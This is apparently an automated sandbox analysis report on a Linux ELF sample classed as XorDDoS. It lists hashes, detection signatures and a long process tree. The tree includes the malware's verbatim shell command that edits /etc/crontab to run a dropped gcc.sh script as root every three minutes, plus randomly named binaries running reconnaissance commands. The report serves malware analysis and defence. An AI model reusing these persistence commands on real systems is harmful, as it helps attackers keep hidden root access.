Edit tour

Linux Analysis Report
eTASxT3bjO.elf

Overview

General Information

Sample name:	eTASxT3bjO.elf renamed because original name is a hash value
Original sample name:	694a672878a1f7945c020a0a3ca74367.elf
Analysis ID:	1423183
MD5:	694a672878a1f7945c020a0a3ca74367
SHA1:	148caeaa8ac7fdf46d48fc2d1d0020d1bf41d442
SHA256:	75bfd448e4274cc4e5804c43768f62a36ccb3fc3b1df06e14d9c892daa2cde19
Tags:	32elfintel
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XorDDoS Bot

Drops files in suspicious directories

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample deletes itself

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Drops files with innocent-looking names

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

PID-file does not contain an ASCII number

Reads CPU information from /proc indicative of miner or evasive malware

Reads system information from the proc file system

Sample has stripped symbol table

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1423183
Start date and time:	2024-04-09 18:15:46 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	eTASxT3bjO.elf renamed because original name is a hash value
Original Sample Name:	694a672878a1f7945c020a0a3ca74367.elf
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/21@16/0

Warnings

VT rate limit hit for: eTASxT3bjO.elf

Runtime Messages

Command:	/tmp/eTASxT3bjO.elf
PID:	5433
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

eTASxT3bjO.elf (PID: 5433, Parent: 5359, MD5: 694a672878a1f7945c020a0a3ca74367) Arguments: /tmp/eTASxT3bjO.elf

eTASxT3bjO.elf New Fork (PID: 5434, Parent: 5433)

eTASxT3bjO.elf New Fork (PID: 5435, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5436, Parent: 5435)

eTASxT3bjO.elf New Fork (PID: 5437, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5438, Parent: 5437)

update-rc.d (PID: 5438, Parent: 2935, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d eTASxT3bjO.elf defaults

update-rc.d New Fork (PID: 5444, Parent: 5438)

systemctl (PID: 5444, Parent: 5438, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

eTASxT3bjO.elf New Fork (PID: 5439, Parent: 5434)

sh (PID: 5439, Parent: 5434, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

sh New Fork (PID: 5440, Parent: 5439)

sed (PID: 5440, Parent: 5439, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

eTASxT3bjO.elf New Fork (PID: 5450, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5451, Parent: 5450)

yfaogzsdtv (PID: 5451, Parent: 5450, MD5: 759fc1fb5286189a09717aea0fde9801) Arguments: /usr/bin/yfaogzsdtv whoami 5434

yfaogzsdtv New Fork (PID: 5452, Parent: 5451)

eTASxT3bjO.elf New Fork (PID: 5453, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5454, Parent: 5453)

yfaogzsdtv (PID: 5454, Parent: 5453, MD5: 759fc1fb5286189a09717aea0fde9801) Arguments: /usr/bin/yfaogzsdtv uptime 5434

yfaogzsdtv New Fork (PID: 5457, Parent: 5454)

eTASxT3bjO.elf New Fork (PID: 5455, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5456, Parent: 5455)

yfaogzsdtv (PID: 5456, Parent: 5455, MD5: 759fc1fb5286189a09717aea0fde9801) Arguments: /usr/bin/yfaogzsdtv gnome-terminal 5434

yfaogzsdtv New Fork (PID: 5460, Parent: 5456)

eTASxT3bjO.elf New Fork (PID: 5458, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5459, Parent: 5458)

yfaogzsdtv (PID: 5459, Parent: 5458, MD5: 759fc1fb5286189a09717aea0fde9801) Arguments: /usr/bin/yfaogzsdtv pwd 5434

yfaogzsdtv New Fork (PID: 5463, Parent: 5459)

eTASxT3bjO.elf New Fork (PID: 5461, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5462, Parent: 5461)

yfaogzsdtv (PID: 5462, Parent: 5461, MD5: 759fc1fb5286189a09717aea0fde9801) Arguments: /usr/bin/yfaogzsdtv "sleep 1" 5434

yfaogzsdtv New Fork (PID: 5466, Parent: 5462)

eTASxT3bjO.elf New Fork (PID: 5470, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5471, Parent: 5470)

uruvhkrplh (PID: 5471, Parent: 5470, MD5: ef17c32fc05c6b3cc1a419a8e88475ec) Arguments: /usr/bin/uruvhkrplh "netstat -an" 5434

uruvhkrplh New Fork (PID: 5472, Parent: 5471)

eTASxT3bjO.elf New Fork (PID: 5473, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5474, Parent: 5473)

uruvhkrplh (PID: 5474, Parent: 5473, MD5: ef17c32fc05c6b3cc1a419a8e88475ec) Arguments: /usr/bin/uruvhkrplh "netstat -antop" 5434

uruvhkrplh New Fork (PID: 5477, Parent: 5474)

eTASxT3bjO.elf New Fork (PID: 5475, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5476, Parent: 5475)

uruvhkrplh (PID: 5476, Parent: 5475, MD5: ef17c32fc05c6b3cc1a419a8e88475ec) Arguments: /usr/bin/uruvhkrplh uptime 5434

uruvhkrplh New Fork (PID: 5479, Parent: 5476)

eTASxT3bjO.elf New Fork (PID: 5478, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5480, Parent: 5478)

uruvhkrplh (PID: 5480, Parent: 5478, MD5: ef17c32fc05c6b3cc1a419a8e88475ec) Arguments: /usr/bin/uruvhkrplh "ps -ef" 5434

uruvhkrplh New Fork (PID: 5483, Parent: 5480)

eTASxT3bjO.elf New Fork (PID: 5481, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5482, Parent: 5481)

uruvhkrplh (PID: 5482, Parent: 5481, MD5: ef17c32fc05c6b3cc1a419a8e88475ec) Arguments: /usr/bin/uruvhkrplh "netstat -antop" 5434

uruvhkrplh New Fork (PID: 5484, Parent: 5482)

eTASxT3bjO.elf New Fork (PID: 5493, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5494, Parent: 5493)

eoogzzilvp (PID: 5494, Parent: 5493, MD5: 8674fc0a95e5d620aac8fa064a44d827) Arguments: /usr/bin/eoogzzilvp pwd 5434

eoogzzilvp New Fork (PID: 5495, Parent: 5494)

eTASxT3bjO.elf New Fork (PID: 5496, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5497, Parent: 5496)

eoogzzilvp (PID: 5497, Parent: 5496, MD5: 8674fc0a95e5d620aac8fa064a44d827) Arguments: /usr/bin/eoogzzilvp su 5434

eoogzzilvp New Fork (PID: 5500, Parent: 5497)

eTASxT3bjO.elf New Fork (PID: 5498, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5499, Parent: 5498)

eoogzzilvp (PID: 5499, Parent: 5498, MD5: 8674fc0a95e5d620aac8fa064a44d827) Arguments: /usr/bin/eoogzzilvp "netstat -antop" 5434

eoogzzilvp New Fork (PID: 5503, Parent: 5499)

eTASxT3bjO.elf New Fork (PID: 5501, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5502, Parent: 5501)

eoogzzilvp (PID: 5502, Parent: 5501, MD5: 8674fc0a95e5d620aac8fa064a44d827) Arguments: /usr/bin/eoogzzilvp bash 5434

eoogzzilvp New Fork (PID: 5506, Parent: 5502)

eTASxT3bjO.elf New Fork (PID: 5504, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5505, Parent: 5504)

eoogzzilvp (PID: 5505, Parent: 5504, MD5: 8674fc0a95e5d620aac8fa064a44d827) Arguments: /usr/bin/eoogzzilvp who 5434

eoogzzilvp New Fork (PID: 5507, Parent: 5505)

eTASxT3bjO.elf New Fork (PID: 5530, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5531, Parent: 5530)

ghgagimgub (PID: 5531, Parent: 5530, MD5: 71b550d02a2581b9bde1f77aaca91265) Arguments: /usr/bin/ghgagimgub top 5434

ghgagimgub New Fork (PID: 5532, Parent: 5531)

eTASxT3bjO.elf New Fork (PID: 5533, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5534, Parent: 5533)

ghgagimgub (PID: 5534, Parent: 5533, MD5: 71b550d02a2581b9bde1f77aaca91265) Arguments: /usr/bin/ghgagimgub "sleep 1" 5434

ghgagimgub New Fork (PID: 5537, Parent: 5534)

eTASxT3bjO.elf New Fork (PID: 5535, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5536, Parent: 5535)

ghgagimgub (PID: 5536, Parent: 5535, MD5: 71b550d02a2581b9bde1f77aaca91265) Arguments: /usr/bin/ghgagimgub id 5434

ghgagimgub New Fork (PID: 5540, Parent: 5536)

eTASxT3bjO.elf New Fork (PID: 5538, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5539, Parent: 5538)

ghgagimgub (PID: 5539, Parent: 5538, MD5: 71b550d02a2581b9bde1f77aaca91265) Arguments: /usr/bin/ghgagimgub pwd 5434

ghgagimgub New Fork (PID: 5543, Parent: 5539)

eTASxT3bjO.elf New Fork (PID: 5541, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5542, Parent: 5541)

ghgagimgub (PID: 5542, Parent: 5541, MD5: 71b550d02a2581b9bde1f77aaca91265) Arguments: /usr/bin/ghgagimgub top 5434

ghgagimgub New Fork (PID: 5544, Parent: 5542)

eTASxT3bjO.elf New Fork (PID: 5548, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5549, Parent: 5548)

mqnpjwpasf (PID: 5549, Parent: 5548, MD5: 66f0c34ae54c78c747182ed45c2efb8c) Arguments: /usr/bin/mqnpjwpasf ifconfig 5434

mqnpjwpasf New Fork (PID: 5550, Parent: 5549)

eTASxT3bjO.elf New Fork (PID: 5551, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5552, Parent: 5551)

mqnpjwpasf (PID: 5552, Parent: 5551, MD5: 66f0c34ae54c78c747182ed45c2efb8c) Arguments: /usr/bin/mqnpjwpasf ifconfig 5434

mqnpjwpasf New Fork (PID: 5555, Parent: 5552)

eTASxT3bjO.elf New Fork (PID: 5553, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5554, Parent: 5553)

mqnpjwpasf (PID: 5554, Parent: 5553, MD5: 66f0c34ae54c78c747182ed45c2efb8c) Arguments: /usr/bin/mqnpjwpasf pwd 5434

mqnpjwpasf New Fork (PID: 5560, Parent: 5554)

eTASxT3bjO.elf New Fork (PID: 5556, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5557, Parent: 5556)

mqnpjwpasf (PID: 5557, Parent: 5556, MD5: 66f0c34ae54c78c747182ed45c2efb8c) Arguments: /usr/bin/mqnpjwpasf sh 5434

mqnpjwpasf New Fork (PID: 5561, Parent: 5557)

eTASxT3bjO.elf New Fork (PID: 5558, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5559, Parent: 5558)

mqnpjwpasf (PID: 5559, Parent: 5558, MD5: 66f0c34ae54c78c747182ed45c2efb8c) Arguments: /usr/bin/mqnpjwpasf "grep \"A\"" 5434

mqnpjwpasf New Fork (PID: 5562, Parent: 5559)

eTASxT3bjO.elf New Fork (PID: 5565, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5566, Parent: 5565)

exnwncfijy (PID: 5566, Parent: 5565, MD5: ea747a0616a82233b50727eb037cf577) Arguments: /usr/bin/exnwncfijy "echo \"find\"" 5434

exnwncfijy New Fork (PID: 5567, Parent: 5566)

eTASxT3bjO.elf New Fork (PID: 5568, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5569, Parent: 5568)

exnwncfijy (PID: 5569, Parent: 5568, MD5: ea747a0616a82233b50727eb037cf577) Arguments: /usr/bin/exnwncfijy "cat resolv.conf" 5434

exnwncfijy New Fork (PID: 5572, Parent: 5569)

eTASxT3bjO.elf New Fork (PID: 5570, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5571, Parent: 5570)

exnwncfijy (PID: 5571, Parent: 5570, MD5: ea747a0616a82233b50727eb037cf577) Arguments: /usr/bin/exnwncfijy top 5434

exnwncfijy New Fork (PID: 5575, Parent: 5571)

eTASxT3bjO.elf New Fork (PID: 5573, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5574, Parent: 5573)

exnwncfijy (PID: 5574, Parent: 5573, MD5: ea747a0616a82233b50727eb037cf577) Arguments: /usr/bin/exnwncfijy id 5434

exnwncfijy New Fork (PID: 5578, Parent: 5574)

eTASxT3bjO.elf New Fork (PID: 5576, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5577, Parent: 5576)

exnwncfijy (PID: 5577, Parent: 5576, MD5: ea747a0616a82233b50727eb037cf577) Arguments: /usr/bin/exnwncfijy "netstat -an" 5434

exnwncfijy New Fork (PID: 5579, Parent: 5577)

eTASxT3bjO.elf New Fork (PID: 5582, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5583, Parent: 5582)

xjdcsmwtwe (PID: 5583, Parent: 5582, MD5: a5d8165af18da100e4fc0b5e182db260) Arguments: /usr/bin/xjdcsmwtwe "sleep 1" 5434

xjdcsmwtwe New Fork (PID: 5584, Parent: 5583)

eTASxT3bjO.elf New Fork (PID: 5585, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5586, Parent: 5585)

xjdcsmwtwe (PID: 5586, Parent: 5585, MD5: a5d8165af18da100e4fc0b5e182db260) Arguments: /usr/bin/xjdcsmwtwe "netstat -an" 5434

xjdcsmwtwe New Fork (PID: 5591, Parent: 5586)

eTASxT3bjO.elf New Fork (PID: 5589, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5590, Parent: 5589)

xjdcsmwtwe (PID: 5590, Parent: 5589, MD5: a5d8165af18da100e4fc0b5e182db260) Arguments: /usr/bin/xjdcsmwtwe pwd 5434

xjdcsmwtwe New Fork (PID: 5595, Parent: 5590)

eTASxT3bjO.elf New Fork (PID: 5592, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5593, Parent: 5592)

xjdcsmwtwe (PID: 5593, Parent: 5592, MD5: a5d8165af18da100e4fc0b5e182db260) Arguments: /usr/bin/xjdcsmwtwe who 5434

xjdcsmwtwe New Fork (PID: 5597, Parent: 5593)

eTASxT3bjO.elf New Fork (PID: 5594, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5596, Parent: 5594)

xjdcsmwtwe (PID: 5596, Parent: 5594, MD5: a5d8165af18da100e4fc0b5e182db260) Arguments: /usr/bin/xjdcsmwtwe who 5434

xjdcsmwtwe New Fork (PID: 5598, Parent: 5596)

eTASxT3bjO.elf New Fork (PID: 5601, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5602, Parent: 5601)

evbjclrakz (PID: 5602, Parent: 5601, MD5: d081c11279702c0cadddc5e2840ded04) Arguments: /usr/bin/evbjclrakz ls 5434

evbjclrakz New Fork (PID: 5603, Parent: 5602)

eTASxT3bjO.elf New Fork (PID: 5604, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5605, Parent: 5604)

evbjclrakz (PID: 5605, Parent: 5604, MD5: d081c11279702c0cadddc5e2840ded04) Arguments: /usr/bin/evbjclrakz ifconfig 5434

evbjclrakz New Fork (PID: 5608, Parent: 5605)

eTASxT3bjO.elf New Fork (PID: 5606, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5607, Parent: 5606)

evbjclrakz (PID: 5607, Parent: 5606, MD5: d081c11279702c0cadddc5e2840ded04) Arguments: /usr/bin/evbjclrakz sh 5434

evbjclrakz New Fork (PID: 5611, Parent: 5607)

eTASxT3bjO.elf New Fork (PID: 5609, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5610, Parent: 5609)

evbjclrakz (PID: 5610, Parent: 5609, MD5: d081c11279702c0cadddc5e2840ded04) Arguments: /usr/bin/evbjclrakz uptime 5434

evbjclrakz New Fork (PID: 5614, Parent: 5610)

eTASxT3bjO.elf New Fork (PID: 5612, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5613, Parent: 5612)

evbjclrakz (PID: 5613, Parent: 5612, MD5: d081c11279702c0cadddc5e2840ded04) Arguments: /usr/bin/evbjclrakz pwd 5434

evbjclrakz New Fork (PID: 5615, Parent: 5613)

eTASxT3bjO.elf New Fork (PID: 5620, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5621, Parent: 5620)

xaxopmwzau (PID: 5621, Parent: 5620, MD5: da1e3752488a7df1e7bfef777b4afd08) Arguments: /usr/bin/xaxopmwzau id 5434

xaxopmwzau New Fork (PID: 5622, Parent: 5621)

eTASxT3bjO.elf New Fork (PID: 5623, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5624, Parent: 5623)

xaxopmwzau (PID: 5624, Parent: 5623, MD5: da1e3752488a7df1e7bfef777b4afd08) Arguments: /usr/bin/xaxopmwzau top 5434

xaxopmwzau New Fork (PID: 5627, Parent: 5624)

eTASxT3bjO.elf New Fork (PID: 5625, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5626, Parent: 5625)

xaxopmwzau (PID: 5626, Parent: 5625, MD5: da1e3752488a7df1e7bfef777b4afd08) Arguments: /usr/bin/xaxopmwzau "netstat -an" 5434

xaxopmwzau New Fork (PID: 5629, Parent: 5626)

eTASxT3bjO.elf New Fork (PID: 5628, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5630, Parent: 5628)

xaxopmwzau (PID: 5630, Parent: 5628, MD5: da1e3752488a7df1e7bfef777b4afd08) Arguments: /usr/bin/xaxopmwzau whoami 5434

xaxopmwzau New Fork (PID: 5633, Parent: 5630)

eTASxT3bjO.elf New Fork (PID: 5631, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5632, Parent: 5631)

xaxopmwzau (PID: 5632, Parent: 5631, MD5: da1e3752488a7df1e7bfef777b4afd08) Arguments: /usr/bin/xaxopmwzau "ifconfig eth0" 5434

xaxopmwzau New Fork (PID: 5634, Parent: 5632)

eTASxT3bjO.elf New Fork (PID: 5638, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5639, Parent: 5638)

ygqhgbaeei (PID: 5639, Parent: 5638, MD5: ea0139d29f09585000d854a5755d4701) Arguments: /usr/bin/ygqhgbaeei "ifconfig eth0" 5434

ygqhgbaeei New Fork (PID: 5640, Parent: 5639)

eTASxT3bjO.elf New Fork (PID: 5641, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5642, Parent: 5641)

ygqhgbaeei (PID: 5642, Parent: 5641, MD5: ea0139d29f09585000d854a5755d4701) Arguments: /usr/bin/ygqhgbaeei ifconfig 5434

ygqhgbaeei New Fork (PID: 5645, Parent: 5642)

eTASxT3bjO.elf New Fork (PID: 5643, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5644, Parent: 5643)

ygqhgbaeei (PID: 5644, Parent: 5643, MD5: ea0139d29f09585000d854a5755d4701) Arguments: /usr/bin/ygqhgbaeei "sleep 1" 5434

ygqhgbaeei New Fork (PID: 5649, Parent: 5644)

eTASxT3bjO.elf New Fork (PID: 5646, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5647, Parent: 5646)

ygqhgbaeei (PID: 5647, Parent: 5646, MD5: ea0139d29f09585000d854a5755d4701) Arguments: /usr/bin/ygqhgbaeei "netstat -antop" 5434

ygqhgbaeei New Fork (PID: 5651, Parent: 5647)

eTASxT3bjO.elf New Fork (PID: 5648, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5650, Parent: 5648)

ygqhgbaeei (PID: 5650, Parent: 5648, MD5: ea0139d29f09585000d854a5755d4701) Arguments: /usr/bin/ygqhgbaeei top 5434

ygqhgbaeei New Fork (PID: 5652, Parent: 5650)

eTASxT3bjO.elf New Fork (PID: 5655, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5656, Parent: 5655)

kffnhivjdw (PID: 5656, Parent: 5655, MD5: ee25b9571b3552e8da3d6f483dba4db6) Arguments: /usr/bin/kffnhivjdw gnome-terminal 5434

kffnhivjdw New Fork (PID: 5658, Parent: 5656)

eTASxT3bjO.elf New Fork (PID: 5657, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5659, Parent: 5657)

kffnhivjdw (PID: 5659, Parent: 5657, MD5: ee25b9571b3552e8da3d6f483dba4db6) Arguments: /usr/bin/kffnhivjdw whoami 5434

kffnhivjdw New Fork (PID: 5662, Parent: 5659)

eTASxT3bjO.elf New Fork (PID: 5660, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5661, Parent: 5660)

kffnhivjdw (PID: 5661, Parent: 5660, MD5: ee25b9571b3552e8da3d6f483dba4db6) Arguments: /usr/bin/kffnhivjdw whoami 5434

kffnhivjdw New Fork (PID: 5665, Parent: 5661)

eTASxT3bjO.elf New Fork (PID: 5663, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5664, Parent: 5663)

kffnhivjdw (PID: 5664, Parent: 5663, MD5: ee25b9571b3552e8da3d6f483dba4db6) Arguments: /usr/bin/kffnhivjdw "ifconfig eth0" 5434

kffnhivjdw New Fork (PID: 5668, Parent: 5664)

eTASxT3bjO.elf New Fork (PID: 5666, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5667, Parent: 5666)

kffnhivjdw (PID: 5667, Parent: 5666, MD5: ee25b9571b3552e8da3d6f483dba4db6) Arguments: /usr/bin/kffnhivjdw "netstat -an" 5434

kffnhivjdw New Fork (PID: 5669, Parent: 5667)

eTASxT3bjO.elf New Fork (PID: 5672, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5673, Parent: 5672)

zqylkjndwx (PID: 5673, Parent: 5672, MD5: 9863c52aa5ffb44be58647ee47948996) Arguments: /usr/bin/zqylkjndwx "netstat -an" 5434

zqylkjndwx New Fork (PID: 5674, Parent: 5673)

eTASxT3bjO.elf New Fork (PID: 5675, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5676, Parent: 5675)

zqylkjndwx (PID: 5676, Parent: 5675, MD5: 9863c52aa5ffb44be58647ee47948996) Arguments: /usr/bin/zqylkjndwx "ifconfig eth0" 5434

zqylkjndwx New Fork (PID: 5679, Parent: 5676)

eTASxT3bjO.elf New Fork (PID: 5677, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5678, Parent: 5677)

zqylkjndwx (PID: 5678, Parent: 5677, MD5: 9863c52aa5ffb44be58647ee47948996) Arguments: /usr/bin/zqylkjndwx who 5434

zqylkjndwx New Fork (PID: 5682, Parent: 5678)

eTASxT3bjO.elf New Fork (PID: 5680, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5681, Parent: 5680)

zqylkjndwx (PID: 5681, Parent: 5680, MD5: 9863c52aa5ffb44be58647ee47948996) Arguments: /usr/bin/zqylkjndwx "ps -ef" 5434

zqylkjndwx New Fork (PID: 5685, Parent: 5681)

eTASxT3bjO.elf New Fork (PID: 5683, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5684, Parent: 5683)

zqylkjndwx (PID: 5684, Parent: 5683, MD5: 9863c52aa5ffb44be58647ee47948996) Arguments: /usr/bin/zqylkjndwx "ls -la" 5434

zqylkjndwx New Fork (PID: 5686, Parent: 5684)

eTASxT3bjO.elf New Fork (PID: 5691, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5692, Parent: 5691)

vijnytmbcx (PID: 5692, Parent: 5691, MD5: 58e08a371adcdc184b14882a86c3a02c) Arguments: /usr/bin/vijnytmbcx su 5434

vijnytmbcx New Fork (PID: 5693, Parent: 5692)

eTASxT3bjO.elf New Fork (PID: 5694, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5695, Parent: 5694)

vijnytmbcx (PID: 5695, Parent: 5694, MD5: 58e08a371adcdc184b14882a86c3a02c) Arguments: /usr/bin/vijnytmbcx su 5434

vijnytmbcx New Fork (PID: 5698, Parent: 5695)

eTASxT3bjO.elf New Fork (PID: 5696, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5697, Parent: 5696)

vijnytmbcx (PID: 5697, Parent: 5696, MD5: 58e08a371adcdc184b14882a86c3a02c) Arguments: /usr/bin/vijnytmbcx "netstat -an" 5434

vijnytmbcx New Fork (PID: 5701, Parent: 5697)

eTASxT3bjO.elf New Fork (PID: 5699, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5700, Parent: 5699)

vijnytmbcx (PID: 5700, Parent: 5699, MD5: 58e08a371adcdc184b14882a86c3a02c) Arguments: /usr/bin/vijnytmbcx "ls -la" 5434

vijnytmbcx New Fork (PID: 5704, Parent: 5700)

eTASxT3bjO.elf New Fork (PID: 5702, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5703, Parent: 5702)

vijnytmbcx (PID: 5703, Parent: 5702, MD5: 58e08a371adcdc184b14882a86c3a02c) Arguments: /usr/bin/vijnytmbcx "ifconfig eth0" 5434

vijnytmbcx New Fork (PID: 5705, Parent: 5703)

eTASxT3bjO.elf New Fork (PID: 5708, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5709, Parent: 5708)

svkksitypo (PID: 5709, Parent: 5708, MD5: 569e47223df9dabc4c719a2764a624b5) Arguments: /usr/bin/svkksitypo "cd /etc" 5434

svkksitypo New Fork (PID: 5710, Parent: 5709)

eTASxT3bjO.elf New Fork (PID: 5711, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5712, Parent: 5711)

svkksitypo (PID: 5712, Parent: 5711, MD5: 569e47223df9dabc4c719a2764a624b5) Arguments: /usr/bin/svkksitypo "cd /etc" 5434

svkksitypo New Fork (PID: 5715, Parent: 5712)

eTASxT3bjO.elf New Fork (PID: 5713, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5714, Parent: 5713)

svkksitypo (PID: 5714, Parent: 5713, MD5: 569e47223df9dabc4c719a2764a624b5) Arguments: /usr/bin/svkksitypo bash 5434

svkksitypo New Fork (PID: 5718, Parent: 5714)

eTASxT3bjO.elf New Fork (PID: 5716, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5717, Parent: 5716)

svkksitypo (PID: 5717, Parent: 5716, MD5: 569e47223df9dabc4c719a2764a624b5) Arguments: /usr/bin/svkksitypo bash 5434

svkksitypo New Fork (PID: 5721, Parent: 5717)

eTASxT3bjO.elf New Fork (PID: 5719, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5720, Parent: 5719)

svkksitypo (PID: 5720, Parent: 5719, MD5: 569e47223df9dabc4c719a2764a624b5) Arguments: /usr/bin/svkksitypo "ps -ef" 5434

svkksitypo New Fork (PID: 5722, Parent: 5720)

eTASxT3bjO.elf New Fork (PID: 5726, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5727, Parent: 5726)

wvicexcnqi (PID: 5727, Parent: 5726, MD5: b7bb93075c07e1415a3ffbb806978f00) Arguments: /usr/bin/wvicexcnqi who 5434

wvicexcnqi New Fork (PID: 5728, Parent: 5727)

eTASxT3bjO.elf New Fork (PID: 5729, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5730, Parent: 5729)

wvicexcnqi (PID: 5730, Parent: 5729, MD5: b7bb93075c07e1415a3ffbb806978f00) Arguments: /usr/bin/wvicexcnqi "route -n" 5434

wvicexcnqi New Fork (PID: 5733, Parent: 5730)

eTASxT3bjO.elf New Fork (PID: 5731, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5732, Parent: 5731)

wvicexcnqi (PID: 5732, Parent: 5731, MD5: b7bb93075c07e1415a3ffbb806978f00) Arguments: /usr/bin/wvicexcnqi "ls -la" 5434

wvicexcnqi New Fork (PID: 5736, Parent: 5732)

eTASxT3bjO.elf New Fork (PID: 5734, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5735, Parent: 5734)

wvicexcnqi (PID: 5735, Parent: 5734, MD5: b7bb93075c07e1415a3ffbb806978f00) Arguments: /usr/bin/wvicexcnqi bash 5434

wvicexcnqi New Fork (PID: 5739, Parent: 5735)

eTASxT3bjO.elf New Fork (PID: 5737, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5738, Parent: 5737)

wvicexcnqi (PID: 5738, Parent: 5737, MD5: b7bb93075c07e1415a3ffbb806978f00) Arguments: /usr/bin/wvicexcnqi "ifconfig eth0" 5434

wvicexcnqi New Fork (PID: 5740, Parent: 5738)

eTASxT3bjO.elf New Fork (PID: 5743, Parent: 5434)

eTASxT3bjO.elf New Fork (PID: 5744, Parent: 5743)

glxnohbcpa (PID: 5744, Parent: 5743, MD5: 75de2ec4c7a2f7ea217f0c93a872a2ce) Arguments: /usr/bin/glxnohbcpa whoami 5434
